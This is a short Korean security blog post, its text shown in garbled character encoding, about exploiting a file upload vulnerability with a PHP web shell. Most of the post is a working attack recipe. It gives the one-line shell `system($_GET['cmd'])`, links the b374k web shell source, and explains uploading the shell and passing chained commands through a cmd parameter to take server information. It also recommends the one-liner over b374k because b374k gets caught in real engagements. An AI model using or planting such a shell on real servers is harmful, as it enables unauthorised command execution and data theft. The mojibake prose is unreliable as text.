์ƒˆ์†Œ์‹

IT & Security/Web

ํŒŒ์ผ์—…๋กœ๋“œ ์ทจ์•ฝ์  - ์›น์‰˜

  • -
๋ฐ˜์‘ํ˜•

ํŒŒ์ผ ์—…๋กœ๋“œ ์ทจ์•ฝ์ ์ด ์žˆ๋Š” ๊ณณ์ด๋ผ๋ฉด ๊ฐ€๋Šฅ.

์‹ค๋ฌด์—์„œ๋Š” b 374k ๊ฐ™์€๊ฑฐ ์“ฐ๋ฉด ์žกํ˜€๊ฐ€๋ฏ€๋กœ ํ•œ์ค„์งœ๋ฆฌ๋กœ ์›น์‰˜ ์ทจ์•ฝ์ ์„ ์ฐพ์•„๋ณด์ž.

https://github.com/tennc/webshell/blob/master/php/b374k/source/b374k-2.8.source.php


1. ์•„๋ž˜ ํŒŒ์ผ์„ php๋กœ ๋งŒ๋“ค์–ด ๋†“๋Š”๋‹ค.

<?php
system($_GET['cmd']);
?>

2. phpํŒŒ์ผ์„ ์ƒ์„ฑํ–ˆ๋‹ค๋ฉด

์˜ฌ๋ฆฐ ip/uploads/a.php ๋ผ๋Š” ๊ณณ์œผ๋กœ ์ ‘๊ทผํ•˜๊ณ  cmd์— ์ ‘๊ทผ ํ•  ๊ฒƒ์ด๋ฏ€๋กœ

?cmd = ls

์ด๋Ÿฐ์‹์œผ๋กœ ๋ช…๋ น์–ด๋ฅผ ์จ์ค€๋‹ค

php๋Š” get๋ฐฉ์‹์œผ๋กœ cmd๊ฐ’์„ system์— ๋„˜๊ฒจ์ฃผ๊ณ  ์žˆ์–ด์„œ ๋ช…๋ น์ด ์„ฑ๊ณต์ ์œผ๋กœ ๋จนํžŒ๋‹ค.

์›น์‰˜ ok

์„œ๋ฒ„ ์ •๋ณด ํƒˆ์ทจ

๋ช…๋ น์–ด๋ฅผ ์ด์œผ๋ ค๋ฉด ์„ธ๋ฏธ์ฝœ๋ก ; ์œผ๋กœ ์ด์–ด์ฃผ๋ฉด ๋จ

๋ฐ˜์‘ํ˜•

'IT & Security > Web' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

mobaxterm ์‚ฌ์šฉํ•˜๊ธฐ  (0) 2020.09.15
chcp ์œˆ๋„์šฐ ํ•œ๊ธ€๊นจ์ง ํ•ด๊ฒฐ  (0) 2020.09.10
Stored XSS ์‹ค์Šต  (0) 2020.08.25
์ธ์ฝ”๋”ฉ(ascii, html, url, base 64 ..)  (0) 2020.08.23
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.